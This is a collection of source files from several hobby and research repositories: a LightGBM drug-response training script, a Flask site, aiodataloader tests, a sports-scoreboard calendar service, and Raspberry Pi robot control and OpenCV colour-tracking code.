#X, y = Ingest.Ingest(files_to_imp, features_to_imp)
#Load in data
X = pd.read_csv(os.path.join(dirname,'X'))
y = pd.read_csv(os.path.join(dirname, 'y'))
X.drop(columns='Unnamed: 0', inplace = True)
y.drop(columns='Unnamed: 0', inplace = True)
X.loc(axis=1)['PUTATIVE_TARGET'] = X.loc(axis=1)['PUTATIVE_TARGET'].astype('category')
X.loc(axis=1)['DRUG_NAME'] = X.loc(axis=1)['DRUG_NAME'].astype('category')
#Create a test, validation and train set
print("\nCreating test, train, and validation datasets")
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state = 12345, test_size=0.1, shuffle = True, stratify = X.loc(axis=1)['DRUG_NAME'])
X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, random_state = 12345, test_size=0.11, shuffle = True, stratify = X_train.loc(axis=1)['DRUG_NAME'])
#LGB datasets are used for model training.
import lightgbm as lgb
train = lgb.Dataset(X_train, label = y_train, free_raw_data = False, categorical_feature=['DRUG_NAME', 'PUTATIVE_TARGET'])
test = lgb.Dataset(X_test, label = y_test, free_raw_data = False, categorical_feature=['DRUG_NAME', 'PUTATIVE_TARGET'])
val = lgb.Dataset(X_val, label = y_val, free_raw_data = False, categorical_feature=['DRUG_NAME', 'PUTATIVE_TARGET'])
print("Complete")
#Delete X and y to free up memory. This step isn't done in the code to cross validate.
#del X, y
#take out the trash to free up memory
gc.collect()
#### Train a single LightGBM Model####
from sklearn.metrics import mean_squared_error as mse
from sklearn.metrics import r2_score
#This dictionary is the parameter list for the model we will be training.
p = {
#'max_depth' : -1, #default = -1, no limit
'max_bin' : 500, #default = 255
#'num_leaves' : 15, #Default = 31 #XGBoost behav = 2^depth - 1
'boosting' : 'gbdt', #Default = gdbt
'metric' : 'rmse',
'num_threads' : -1,
'force_col_wise': True,
#'use_missing' : False, #default = True
'learning_rate' : 0.08, #default = 0.1
#'feature_fraction' : 0.75,
#'lambda_l1' : 0, #default = 0
#'lambda_l2' : 0, #Default = 0
'cat_smooth' : 150, #Default = 10
'cat_l2': 300, #default = 10
'min_data_per_group' : 150, #default = 100
'max_cat_threshold' : 200, #default = 32
'min_data_in_leaf' : 10, #default = 20
#'extra_trees' : True, #default = False
#'subsample' : 1.0, #Default = 1
#'colsample_bytree' : 0.5,
#'bagging_fraction' : 0.75, #Default = 1, used to deal with overfitting
#'bagging_freq' : 100, #Default = 0, used to deal with overfitting in conjunction with bagging_fraction.
#'path_smooth' : 150,
}
#This links to neptune.ai to monitor the training of the model.
#Go to this link to the see the experiment: https://ui.neptune.ai/clljos001/CCLDP
neptune.create_experiment(name="CCL_DP", tags=['Desktop', 'Example_Code'], params=p)
trial_reg = lgb.train(
params = p, #Parameter dictionary
train_set = train, #Train set created earlier
num_boost_round=20000, #How many rounds to train for unless early stopping is reached
valid_sets = [val], #Set to validate on
valid_names = ['Validation'],
feature_name = 'auto',
categorical_feature = 'auto',
early_stopping_rounds = 150, #If not performance improvements for 150 rounds then stop.
verbose_eval = 50, #Tell us how the training is doing every 50 rounds.
)
#Save the model we just trained
trial_reg.save_model('LightGBM_Model')
###Performance Metrics & Logging to Neptune.ai###
test_pred = trial_reg.predict(X_test)
r2_test = r2_score(y_test,test_pred)
neptune.log_metric('Test R2', r2_test)
val_pred = trial_reg.predict(X_val)
r2_val = r2_score(y_val,val_pred)
neptune.log_metric('Validation R2', r2_val)
train_pred = trial_reg.predict(X_train)
r2_train = r2_score(y_train, train_pred)
neptune.log_metric('Train R2', r2_train)
print('R2 for Test: ', r2_test, '\nR2 for Validation: ', r2_val, '\nR2 for Train: ', r2_train)
rmse_test = math.sqrt(mse(y_test, test_pred))
print("RMSE for Test: ", rmse_test)
neptune.log_metric('test rmse', rmse_test)
rmse_train = math.sqrt(mse(y_train, train_pred))
print("RMSE for Train: ", rmse_train)
neptune.log_metric('Test rmse', rmse_train)
#Close the neptune uplink
neptune.stop()
#Print the model's feature importance excluding drug_name and drug_target
print(Model_Explore(trial_reg))
``` |
{
"source": "joshcurll/website",
"score": 3
} |
#### File: website/web/app.py
```python
from datetime import datetime
from flask import Flask
from flask import render_template
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
# using sqlite for testing
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///site.db'
db = SQLAlchemy(app)
# this class along with any others should be in seperate files
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(20), unique=True, nullable=False)
email = db.Column(db.String(50), unique=True, nullable=False)
image_file = db.Column(db.String(20),
nullable=False,
default='default.jpg')
# obviously we will want to move this to another table
password = db.Column(db.String(100), nullable=False)
posts = db.relationship('Post', backref='author', lazy=True)
def __repr__(self):
return f"User('{self.username}', '{self.email}', '{self.image_file}')"
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(100), nullable=False)
date_posted = db.Column(db.DateTime, nullable=False,
default=datetime.utcnow)
content = db.Column(db.Text, nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
def __repr__(self):
return f"Post('{self.title}', '{self.date_posted}')"
announcements = [{
'title': 'First Announcement',
'date_posted': '11 July 2018',
'content': 'First Announcement Posted for Testing'
},
{
'title': 'Second Announcement',
'date_posted': '12 July 2018',
'content': 'Second Announcement Posted.'
}]
@app.route('/')
def index_page():
return render_template('index.html', announcements=announcements)
@app.route('/about')
def about():
return render_template('about.html')
@app.route('/hello/')
@app.route('/hello/<name>')
def hello(name=None):
return render_template('hello.html', name=name)
@app.route('/members')
def members():
return render_template('members.html')
@app.route('/projects/')
def projects():
return render_template('projects.html')
@app.route('/login')
def login_page():
return render_template('login-page.html')
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True)
``` |
{
"source": "joshcurtis/aiodataloader",
"score": 2
} |
#### File: joshcurtis/aiodataloader/test_aiodataloader.py
```python
import pytest
from asyncio import gather
from functools import partial
from pytest import raises
from aiodataloader import DataLoader
pytestmark = pytest.mark.asyncio
async def do_test():
return True
def id_loader(**options):
load_calls = []
async def default_resolve(x):
return x
resolve = options.pop('resolve', default_resolve)
async def fn(keys):
load_calls.append(keys)
return await resolve(keys)
# return keys
identity_loader = DataLoader(fn, **options)
return identity_loader, load_calls
async def test_build_a_simple_data_loader():
async def call_fn(keys):
return keys
identity_loader = DataLoader(call_fn)
promise1 = identity_loader.load(1)
value1 = await promise1
assert value1 == 1
async def test_can_build_a_data_loader_from_a_partial():
value_map = {1: 'one'}
async def call_fn(context, keys):
return [context.get(key) for key in keys]
partial_fn = partial(call_fn, value_map)
identity_loader = DataLoader(partial_fn)
promise1 = identity_loader.load(1)
value1 = await promise1
assert value1 == 'one'
async def test_supports_loading_multiple_keys_in_one_call():
async def call_fn(keys):
return keys
identity_loader = DataLoader(call_fn)
promise_all = identity_loader.load_many([1, 2])
values = await promise_all
assert values == [1, 2]
promise_all = identity_loader.load_many([])
values = await promise_all
assert values == []
async def test_batches_multiple_requests():
identity_loader, load_calls = id_loader()
promise1 = identity_loader.load(1)
promise2 = identity_loader.load(2)
p = gather(promise1, promise2)
value1, value2 = await p
assert value1 == 1
assert value2 == 2
assert load_calls == [[1, 2]]
async def test_batches_multiple_requests_with_max_batch_sizes():
identity_loader, load_calls = id_loader(max_batch_size=2)
promise1 = identity_loader.load(1)
promise2 = identity_loader.load(2)
promise3 = identity_loader.load(3)
p = gather(promise1, promise2, promise3)
value1, value2, value3 = await p
assert value1 == 1
assert value2 == 2
assert value3 == 3
assert load_calls == [[1, 2], [3]]
async def test_coalesces_identical_requests():
identity_loader, load_calls = id_loader()
promise1 = identity_loader.load(1)
promise2 = identity_loader.load(1)
assert promise1 == promise2
p = gather(promise1, promise2)
value1, value2 = await p
assert value1 == 1
assert value2 == 1
assert load_calls == [[1]]
async def test_caches_repeated_requests():
identity_loader, load_calls = id_loader()
a, b = await gather(
identity_loader.load('A'),
identity_loader.load('B')
)
assert a == 'A'
assert b == 'B'
assert load_calls == [['A', 'B']]
a2, c = await gather(
identity_loader.load('A'),
identity_loader.load('C')
)
assert a2 == 'A'
assert c == 'C'
assert load_calls == [['A', 'B'], ['C']]
a3, b2, c2 = await gather(
identity_loader.load('A'),
identity_loader.load('B'),
identity_loader.load('C')
)
assert a3 == 'A'
assert b2 == 'B'
assert c2 == 'C'
assert load_calls == [['A', 'B'], ['C']]
async def test_clears_single_value_in_loader():
identity_loader, load_calls = id_loader()
a, b = await gather(
identity_loader.load('A'),
identity_loader.load('B')
)
assert a == 'A'
assert b == 'B'
assert load_calls == [['A', 'B']]
identity_loader.clear('A')
a2, b2 = await gather(
identity_loader.load('A'),
identity_loader.load('B')
)
assert a2 == 'A'
assert b2 == 'B'
assert load_calls == [['A', 'B'], ['A']]
async def test_clears_all_values_in_loader():
identity_loader, load_calls = id_loader()
a, b = await gather(
identity_loader.load('A'),
identity_loader.load('B')
)
assert a == 'A'
assert b == 'B'
assert load_calls == [['A', 'B']]
identity_loader.clear_all()
a2, b2 = await gather(
identity_loader.load('A'),
identity_loader.load('B')
)
assert a2 == 'A'
assert b2 == 'B'
assert load_calls == [['A', 'B'], ['A', 'B']]
async def test_allows_priming_the_cache():
identity_loader, load_calls = id_loader()
identity_loader.prime('A', 'A')
a, b = await gather(
identity_loader.load('A'),
identity_loader.load('B')
)
assert a == 'A'
assert b == 'B'
assert load_calls == [['B']]
async def test_does_not_prime_keys_that_already_exist():
identity_loader, load_calls = id_loader()
identity_loader.prime('A', 'X')
a1 = await identity_loader.load('A')
b1 = await identity_loader.load('B')
assert a1 == 'X'
assert b1 == 'B'
identity_loader.prime('A', 'Y')
identity_loader.prime('B', 'Y')
a2 = await identity_loader.load('A')
b2 = await identity_loader.load('B')
assert a2 == 'X'
assert b2 == 'B'
assert load_calls == [['B']]
# # Represents Errors
async def test_resolves_to_error_to_indicate_failure():
async def resolve(keys):
mapped_keys = [
key if key % 2 == 0 else Exception("Odd: {}".format(key))
for key in keys
]
return mapped_keys
even_loader, load_calls = id_loader(resolve=resolve)
with raises(Exception) as exc_info:
await even_loader.load(1)
assert str(exc_info.value) == "Odd: 1"
value2 = await even_loader.load(2)
assert value2 == 2
assert load_calls == [[1], [2]]
async def test_can_represent_failures_and_successes_simultaneously():
async def resolve(keys):
mapped_keys = [
key if key % 2 == 0 else Exception("Odd: {}".format(key))
for key in keys
]
return mapped_keys
even_loader, load_calls = id_loader(resolve=resolve)
promise1 = even_loader.load(1)
promise2 = even_loader.load(2)
with raises(Exception) as exc_info:
await promise1
assert str(exc_info.value) == "Odd: 1"
value2 = await promise2
assert value2 == 2
assert load_calls == [[1, 2]]
async def test_caches_failed_fetches():
async def resolve(keys):
mapped_keys = [
Exception("Error: {}".format(key))
for key in keys
]
return mapped_keys
error_loader, load_calls = id_loader(resolve=resolve)
with raises(Exception) as exc_info:
await error_loader.load(1)
assert str(exc_info.value) == "Error: 1"
with raises(Exception) as exc_info:
await error_loader.load(1)
assert str(exc_info.value) == "Error: 1"
assert load_calls == [[1]]
async def test_caches_failed_fetches_2():
identity_loader, load_calls = id_loader()
identity_loader.prime(1, Exception("Error: 1"))
with raises(Exception) as exc_info:
await identity_loader.load(1)
assert load_calls == []
# It is resilient to job queue ordering
async def test_batches_loads_occuring_within_promises():
identity_loader, load_calls = id_loader()
async def load_b_1():
return await load_b_2()
async def load_b_2():
return await identity_loader.load('B')
values = await gather(
identity_loader.load('A'),
load_b_1()
)
assert values == ['A', 'B']
assert load_calls == [['A', 'B']]
async def test_catches_error_if_loader_resolver_fails():
exc = Exception("AOH!")
def do_resolve(x):
raise exc
a_loader, a_load_calls = id_loader(resolve=do_resolve)
with raises(Exception) as exc_info:
await a_loader.load('A1')
assert exc_info.value == exc
async def test_can_call_a_loader_from_a_loader():
deep_loader, deep_load_calls = id_loader()
a_loader, a_load_calls = id_loader(resolve=lambda keys:deep_loader.load(tuple(keys)))
b_loader, b_load_calls = id_loader(resolve=lambda keys:deep_loader.load(tuple(keys)))
a1, b1, a2, b2 = await gather(
a_loader.load('A1'),
b_loader.load('B1'),
a_loader.load('A2'),
b_loader.load('B2')
)
assert a1 == 'A1'
assert b1 == 'B1'
assert a2 == 'A2'
assert b2 == 'B2'
assert a_load_calls == [['A1', 'A2']]
assert b_load_calls == [['B1', 'B2']]
assert deep_load_calls == [[('A1', 'A2'), ('B1', 'B2')]]
async def test_dataloader_clear_with_missing_key_works():
async def do_resolve(x):
return x
a_loader, a_load_calls = id_loader(resolve=do_resolve)
assert a_loader.clear('A1') == a_loader
``` |
{
"source": "joshcvt/icsMiddleman",
"score": 2
} |
#### File: joshcvt/icsMiddleman/app.py
```python
from chalice import Chalice, Response
from chalicelib.middleman import do_milb
import icalendar
app = Chalice(app_name='icsMiddleman')
@app.route('/')
def index():
return {'hello': 'world'}
@app.route('/milb/{teamtoken}')
def get_milb(teamtoken):
return Response(body=do_milb(teamtoken),
status_code=200,
headers={'Content-Type': 'text/calendar'})
``` |
{
"source": "joshcvt/resetter",
"score": 3
} |
#### File: resetter/chalicelib/ncaaf_espn.py
```python
import urllib.request, urllib.error, urllib.parse, json, traceback, time
from datetime import datetime, timedelta
from .reset_lib import joinOr, sentenceCap, NoGameException, NoTeamException, toOrdinal
from .ncaa_espn_lib import ncaaNickDict, displayOverrides, iaa, validFbSet
SCOREBOARD_ROOT_URL = "http://site.api.espn.com/apis/site/v2/sports/football/college-football/scoreboard"
# start with this to get weeks, then customize for this week and full scoreboard
#http://site.api.espn.com/apis/site/v2/sports/football/college-football/scoreboard?week=4&groups=80&limit=388&1577314600
# global for caching
__MOD = {}
# cache time for scoreboard
CACHE_INTERVAL = timedelta(minutes=1)
def get_scoreboard(file=None,iaa=False,debug=False):
"""Get scoreboard from site, or from file if specified for testing."""
FBS_GROUPS = "80"
FCS_GROUPS = "81"
SB_FORMAT_TAIL = '?week=%s&groups=%s&limit=388&%s'
if file:
print ("Using scoreboard from file: " + file)
with open(file) as f:
sb = json.load(f)
else:
if debug:
print("Root: " + SCOREBOARD_ROOT_URL)
try:
scoreboardWeekUrl = "unconstructed"
with urllib.request.urlopen(SCOREBOARD_ROOT_URL) as fh:
sb = json.load(fh)
now = datetime.now()
for week in sb['leagues'][0]['calendar'][0]['entries']:
if datetime.strptime(week['endDate'],'%Y-%m-%dT%H:%MZ') > now:
weekValue = week['value']
break
# scoreboardWeekUrl = SCOREBOARD_ROOT_URL + "?week=" + str(weekValue) + "&groups=" + FBS_GROUPS + "&limit=388&" + now.timestamp().__str__()
if iaa:
scoreboardWeekUrl = SCOREBOARD_ROOT_URL + SB_FORMAT_TAIL % (str(weekValue), FCS_GROUPS, now.timestamp().__str__())
else:
scoreboardWeekUrl = SCOREBOARD_ROOT_URL + SB_FORMAT_TAIL % (str(weekValue), FBS_GROUPS, now.timestamp().__str__())
if debug:
print("URL: " + scoreboardWeekUrl)
with urllib.request.urlopen(scoreboardWeekUrl) as fh:
sb = json.load(fh)
except urllib.error.HTTPError as e:
if e.code == 404:
raise NoGameException("Scoreboard HTTP 404. This probably means the season is over. Root = " + SCOREBOARD_ROOT_URL + ", week " + scoreboardWeekUrl + "\n")
else:
raise e
except Exception as e:
raise e
finally:
fh.close()
return sb
def find_game(sb,team):
"""Passed scoreboard dict and team string, get game."""
for event in sb['events']:
if test_game(event,team):
return event
return None
def test_game(game,team):
"""Broken out so we can test for all kinds of variations once we build the variation list."""
return (team.lower() in [game["competitions"][0]["competitors"][0]["team"]["location"].lower(),
game["competitions"][0]["competitors"][1]["team"]["location"].lower(),
game["competitions"][0]["competitors"][0]["team"]["displayName"].lower(),
game["competitions"][0]["competitors"][1]["team"]["displayName"].lower(),
game["competitions"][0]["competitors"][0]["team"]["abbreviation"].lower(),
game["competitions"][0]["competitors"][1]["team"]["abbreviation"].lower()])
def game_loc(game):
return "in " + game["competitions"][0]["venue"]["address"]["city"]
# probably want to get stadium and city for neutral-site games
def rank_name(team):
#return # could also be displayName which is full name
pref = team["team"]["location"]
#if pref.lower() in displayOverrides: pref = displayOverrides[raw.lower()]
if team["curatedRank"]['current'] == 99:
return pref
else:
return "#" + str(team["curatedRank"]['current']) + " " + pref
def scoreline(game):
# flip home first if they're leading, otherwise away-first convention if it's tied
t1 = game["competitions"][0]["competitors"][0]
t2 = game["competitions"][0]["competitors"][1]
if int(t1["score"]) > int(t2["score"]):
gleader = t1
gtrailer = t2
else:
gleader = t2
gtrailer = t1
return (rank_name(gleader) + " " + gleader["score"].strip() + ", " + rank_name(gtrailer) + " " + gtrailer["score"].strip())
def spaceday(game,sayToday=False):
(now, utcnow) = (datetime.now(),datetime.utcnow())
utcdiff = (utcnow - now).seconds
startLocal = datetime.strptime(game['competitions'][0]['startDate'], "%Y-%m-%dT%H:%MZ") - timedelta(seconds=utcdiff)
if startLocal.date() == now.date():
if sayToday:
return ' today'
else:
return ''
else:
return ' ' + startLocal.strftime("%A")
def status(game):
if game == None:
return None
statusnode = game["competitions"][0]["status"]
if statusnode["type"]["name"] == "STATUS_FINAL":
status = "Final " + game_loc(game) + ", " + scoreline(game)
if statusnode["type"]["detail"].endswith("OT)"):
status += statusnode["type"]["detail"].split("/")[1]
status += "."
elif statusnode["type"]["name"] == "STATUS_SCHEDULED":
status = rank_name(game["competitions"][0]['competitors'][1]) + " plays " + rank_name(game["competitions"][0]['competitors'][0]) + " at " + game["status"]["type"]["shortDetail"].split(' - ')[1] + spaceday(game) + " " + game_loc(game) + "."
else:
status = scoreline(game)
if statusnode["type"]["name"] == "STATUS_HALFTIME":
status += " at halftime "
elif statusnode["type"]["name"] == "STATUS_IN_PROGRESS" and statusnode["type"]["detail"].endswith("OT"):
status += " in " + statusnode["type"]["detail"] + " "
elif (statusnode["type"]["name"] == "STATUS_END_PERIOD") or ((statusnode["type"]["name"] == "STATUS_IN_PROGRESS") and (statusnode["displayClock"].strip() == "0:00")):
status += ", end of the " + toOrdinal(statusnode["period"]) + " quarter "
elif (statusnode["type"]["name"] == "STATUS_IN_PROGRESS") and (statusnode["displayClock"].strip() == "15:00"):
status += ", start of the " + toOrdinal(statusnode["period"]) + " quarter "
elif statusnode["type"]["name"] == "STATUS_IN_PROGRESS":
status += ", " + statusnode["displayClock"].strip() + " to go in the " + toOrdinal(statusnode["period"]) + " quarter "
else: # just dump it
status += ", " + statusnode["type"]["name"] + ' '
status += game_loc(game) + "."
if 0:
if 1:
pass
elif game["gameState"] in ("cancelled","postponed"):
status = rank_name(game["away"]) + " vs. " + rank_name(game["home"]) + " originally scheduled for" + spaceday(game,sayToday=True) + " " + game_loc(game) + " is " + game["gameState"] + "."
elif game["gameState"] in ("delayed"):
status = rank_name(game["away"]) + " vs. " + rank_name(game["home"]) + " " + game_loc(game) + " is " + game["gameState"] + "."
return sentenceCap(status)
def get(team,forceReload=False,debug=False,file=None):
global __MOD
tkey = team.lower().strip()
if debug:
print("tkey: " + tkey + ", ", end="")
if (tkey in iaa) or (tkey in ncaaNickDict and ncaaNickDict[tkey] in iaa):
# we're going to be lazy about caching and just always reload for I-AA games
if debug:
print ("I-AA load: ", end="")
sb = get_scoreboard(iaa=True,debug=debug)
elif tkey not in validFbSet:
raise NoTeamException(tkey + " is not a valid team.")
else: # main I-A schedule cycle
if forceReload \
or ("ncaafsb" not in __MOD) \
or (("ncaafsbdt" in __MOD) and (datetime.utcnow() - __MOD["ncaafsbdt"] > CACHE_INTERVAL)) \
or (("ncaafsb" in __MOD) and (("ncaaffile" not in __MOD) or (file != __MOD["ncaaffile"]))):
if debug:
print ("fresh load: ", end="")
__MOD["ncaaffile"] = file
__MOD["ncaafsb"] = get_scoreboard(debug=debug,file=file)
__MOD["ncaafsbdt"] = datetime.utcnow()
else:
if debug:
print ("cached: ", end="")
pass
sb = __MOD["ncaafsb"]
game = find_game(sb,team)
if game:
return status(game)
elif (tkey in ncaaNickDict):
if (ncaaNickDict[tkey].__class__ == list):
return "For " + team + ", please choose " + joinOr(ncaaNickDict[tkey]) + "."
else:
game = find_game(sb,ncaaNickDict[tkey])
if game:
return status(game)
# fallthru
ret = "No game this week for " + team
if ret[-1] != ".":
ret += "."
raise NoGameException(ret)
``` |
{
"source": "joshdabosh/autopack",
"score": 3
} |
#### File: autopack/finished/phase-35-final.py
```python
from picamera.array import PiRGBArray
from picamera import PiCamera
import RPi.GPIO as GPIO
import cv2
import numpy as np
import movements
import time
def find_pos(x):
x_cent = 320
if x > x_cent:
direction = 'right'
else:
direction = 'left'
return direction
def main():
robot = movements.robot()
camera = PiCamera()
camera.resolution = (640, 480)
camera.framerate = 50
camera.hflip = True
camera.vflip = True
rawCapture = PiRGBArray(camera, size=(640, 480))
time.sleep(0.1)
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
image = frame.array
blur = cv2.GaussianBlur(image, (3,3), 0)
lower = np.array([3,9,114], dtype="uint8")
upper = np.array([43, 49, 154], dtype="uint8")
thresh = cv2.inRange(blur, lower, upper)
thresh2 = thresh.copy()
image, contours, hierarchy = cv2.findContours(thresh,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
max_area = 0
best_cent = 1
detected = False
for cent in contours:
area = cv2.contourArea(cent)
if area > max_area:
max_area = area
best_cent = cent
detected = True
M = cv2.moments(best_cent)
cx = int(M['m10']/M['m00'])
cy = int(M['m01']/M['m00'])
cv2.circle(blur,(cx,cy),10,(0,0,255), -1)
cv2.imshow('Tracking', blur)
direction = find_pos(cx)
if detected == True:
#print '{}'.format(direction)
dist = int(robot.scan_for_obstacles())
if direction == 'left':
if dist < 30:
robot.left()
else:
robot.left_forward()
else:
if dist < 30:
robot.right()
else:
robot.right_forward()
else:
#print 'nuttin'
robot.pause()
blah = cv2.waitKey(1) & 0xFF
rawCapture.truncate(0)
if blah == ord("q"):
break
if __name__ == '__main__':
main()
GPIO.cleanup()
```
#### File: autopack/open_cv/color-tracking.py
```python
from picamera.array import PiRGBArray
from picamera import PiCamera
import time
import cv2
import numpy as np
# set the text font
font = cv2.FONT_HERSHEY_SIMPLEX
# set the center of the frame for x and y
x_cent = 320
y_cent = 240
# determine the relative position the detected point is at to the camera
def find_dir(x):
if x > x_cent:
direction = 'right'
else:
direction = 'left'
return direction
# initialize the camera and grab a reference to the raw camera capture
camera = PiCamera()
camera.resolution = (640, 480)
camera.framerate = 50
camera.hflip = True
rawCapture = PiRGBArray(camera, size=(640, 480))
# allow the camera to warmup
time.sleep(0.1)
# capture frames from the camera
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
# grab the raw NumPy array representing the image, then initialize the timestamp
# and occupied/unoccupied text
image = frame.array
blur = cv2.blur(image, (3,3))
#hsv to complicate things, or stick with BGR
#hsv = cv2.cvtColor(blur,cv2.COLOR_BGR2HSV)
#thresh = cv2.inRange(hsv,np.array((0, 200, 200)), np.array((20, 255, 255)))
lower = np.array([3, 9, 114],dtype="uint8")
upper = np.array([43, 49, 154], dtype="uint8")
thresh = cv2.inRange(blur, lower, upper)
thresh2 = thresh.copy()
# find contours in the threshold image
image, contours, hierarchy = cv2.findContours(thresh,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
# finding contour with maximum area and store it as best_cnt
max_area = 0
best_cnt = 1
for cnt in contours:
area = cv2.contourArea(cnt)
if area > max_area:
max_area = area
best_cnt = cnt
# finding centroids of best_cnt and draw a circle there
M = cv2.moments(best_cnt)
cx,cy = int(M['m10']/M['m00']), int(M['m01']/M['m00'])
cv2.circle(blur,(cx,cy),10,(0,0,255),-1)
# draws a line to the object
cv2.line(blur,(cx,cy),((cx-25),(cy-25)),(0,0,255), 2)
# finds the relative direction
direction = find_dir(cx)
# displays the location of the detected color
cv2.putText(blur, ('{0}'.format(direction)), ((cx-30), (cy-30)), font, 0.8, (0,255,0), 2, cv2.LINE_AA)
# show the frame
cv2.imshow("Frame", blur)
#cv2.imshow('thresh',thresh2)
key = cv2.waitKey(1) & 0xFF
# clear the stream in preparation for the next frame
rawCapture.truncate(0)
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
```
#### File: autopack/phase-2/phase-2-1_11_2018.py
```python
import RPi.GPIO as GPIO
import curses
import time
global distance
distance = 11
TRIG = 24
ECHO = 26
screen = curses.initscr()
curses.noecho()
curses.cbreak()
screen.keypad(True)
GPIO.setmode(GPIO.BOARD)
GPIO.setup(7, GPIO.OUT) # motor 1, forward, top right
GPIO.setup(11, GPIO.OUT) # motor 1, backward, top right
GPIO.setup(13, GPIO.OUT) # motor 2, forward, top left
GPIO.setup(15, GPIO.OUT) # motor 2, backward, top left
GPIO.setup(12, GPIO.OUT) # motor 3, forward, bottom right
GPIO.setup(16, GPIO.OUT) # motor 3, backward, bottom right
GPIO.setup(18, GPIO.OUT) # motor 4, forward, botton left
GPIO.setup(22, GPIO.OUT) # motor 4, backward, bottom left
GPIO.setup(TRIG, GPIO.OUT) # trigger voltage setup
GPIO.setup(ECHO, GPIO.IN) # echo input setup
GPIO.output(7, False) # set everything to false at startup
GPIO.output(11, False)
GPIO.output(13, False)
GPIO.output(15, False)
GPIO.output(12, False)
GPIO.output(16, False)
GPIO.output(18, False)
GPIO.output(22, False)
GPIO.output(TRIG, False)
def forward():
screen.addstr(0,0, 'up ')
GPIO.output(7, False) # makes sure that nothing else
GPIO.output(11, False) # is running when this runs
GPIO.output(13, False)
GPIO.output(15, False)
GPIO.output(12, False)
GPIO.output(16, False)
GPIO.output(18, False)
GPIO.output(22, False)
GPIO.output(7, True)
GPIO.output(13, True)
GPIO.output(12, True)
GPIO.output(18, True)
def backward():
screen.addstr(0,0,'down ')
GPIO.output(7, False)
GPIO.output(11, False)
GPIO.output(13, False)
GPIO.output(15, False)
GPIO.output(12, False)
GPIO.output(16, False)
GPIO.output(18, False)
GPIO.output(22, False)
GPIO.output(11, True)
GPIO.output(15, True)
GPIO.output(16, True)
GPIO.output(22, True)
def left():
screen.addstr(0,0,'left ')
GPIO.output(7, False)
GPIO.output(11, False)
GPIO.output(13, False)
GPIO.output(15, False)
GPIO.output(12, False)
GPIO.output(16, False)
GPIO.output(18, False)
GPIO.output(22, False)
GPIO.output(11, True)
GPIO.output(16, True)
#GPIO.output(13, True)
GPIO.output(18, True)
def right():
screen.addstr(0,0, 'right')
GPIO.output(7, False)
GPIO.output(11, False)
GPIO.output(13, False)
GPIO.output(15, False)
GPIO.output(12, False)
GPIO.output(16, False)
GPIO.output(18, False)
GPIO.output(22, False)
GPIO.output(7, True)
GPIO.output(15, True)
#GPIO.output(12, True)
GPIO.output(22, True)
def stop():
screen.addstr(0,0,'stop ')
GPIO.output(7, False)
GPIO.output(11, False)
GPIO.output(13, False)
GPIO.output(15, False)
GPIO.output(12, False)
GPIO.output(16, False)
GPIO.output(18, False)
GPIO.output(22, False)
def backup(backTime):
GPIO.output(7, False)
GPIO.output(11, False)
GPIO.output(13, False)
GPIO.output(15, False)
GPIO.output(12, False)
GPIO.output(16, False)
GPIO.output(18, False)
GPIO.output(22, False)
GPIO.output(11, True)
GPIO.output(15, True)
GPIO.output(16, True)
GPIO.output(22, True)
time.sleep(backTime)
GPIO.output(7, False)
GPIO.output(11, False)
GPIO.output(13, False)
GPIO.output(15, False)
GPIO.output(12, False)
GPIO.output(16, False)
GPIO.output(18, False)
GPIO.output(22, False)
def move(dist):
if dist >= 10:
char = screen.getch()
if char == curses.KEY_UP:
forward()
elif char == curses.KEY_DOWN:
backward()
elif char == curses.KEY_LEFT:
left()
elif char == curses.KEY_RIGHT:
right()
elif char == 32 or char == 10:
stop()
else:
backup(1)
def scan_for_obstacles():
# tells the sensor to fire a burst of sound
GPIO.output(TRIG, True)
time.sleep(0.00001)
GPIO.output(TRIG, False)
if GPIO.input(ECHO) == 1:
start = time.time()
while GPIO.input(ECHO) == 1:
if time.time() - start > 0.25:
break
else:
pass
stop = time.time()
global distance
distance = (stop-start) * 17000
else:
global distance
distance = 11
return distance
def Main():
try:
while True:
dist2 = scan_for_obstacles()
move(dist2)
screen.addstr(5,0,str(dist2))
finally:
# shut down cleanly
curses.nocbreak(); screen.keypad(0); curses.echo()
curses.endwin()
GPIO.cleanup()
if __name__ == '__main__':
Main()
```
#### File: autopack/test_files/multi-threading_test.py
```python
from threading import Thread
import time
def timer(name, delay, repeat):
print "Timer: " + name + " Started"
while repeat > 0:
time.sleep(delay)
print name + ": " + str(time.ctime(time.time()))
repeat -= 1
print "Timer: " + name + " Completed"
def Main():
t1 = Thread(target=timer, args=("Timer1", 1, 5))
t2 = Thread(target=timer, args=("Timer2", 2, 5))
t1.start()
t2.start()
print "main is done"
if __name__ == '__main__':
Main()
```
#### File: autopack/test_files/threading_while_scanning.py
```python
import RPi.GPIO as GPIO
import time
from threading import Thread
distances = []
TRIG = 24
ECHO = 26
GPIO.setmode(GPIO.BOARD)
GPIO.setup(TRIG, GPIO.OUT) # trigger voltage setup
GPIO.setup(ECHO, GPIO.IN) # echo input setup
GPIO.output(TRIG, False)
distances = []
def scan_for_obstacles():
GPIO.setmode(GPIO.BOARD)
while True:
GPIO.setmode(GPIO.BOARD)
# tells the sensor to fire a burst of sound
GPIO.output(TRIG, True)
time.sleep(0.00001)
GPIO.output(TRIG, False)
while GPIO.input(ECHO) == 0:
pass
startTime = time.time()
while GPIO.input(ECHO) == 1:
pass
stopTime = time.time()
distance = (stopTime-startTime) * 17000
distances.append(distance)
time.sleep(0.025)
def move():
dist = distances[-1]
if dist <= 10:
print 'uh oh a-somebody toucha mah spagheett'
def Main():
try:
t1 = Thread(target = scan_for_obstacles)
t1.start()
t2 = Thread(target=move)
t2.start()
t2.join()
print distances
except KeyboardInterrupt:
# shut down cleanly
GPIO.cleanup()
if __name__ == '__main__':
Main()
```
#### File: autopack/test_files/voltage-divider.py
```python
def divider(vin,vout,r1):
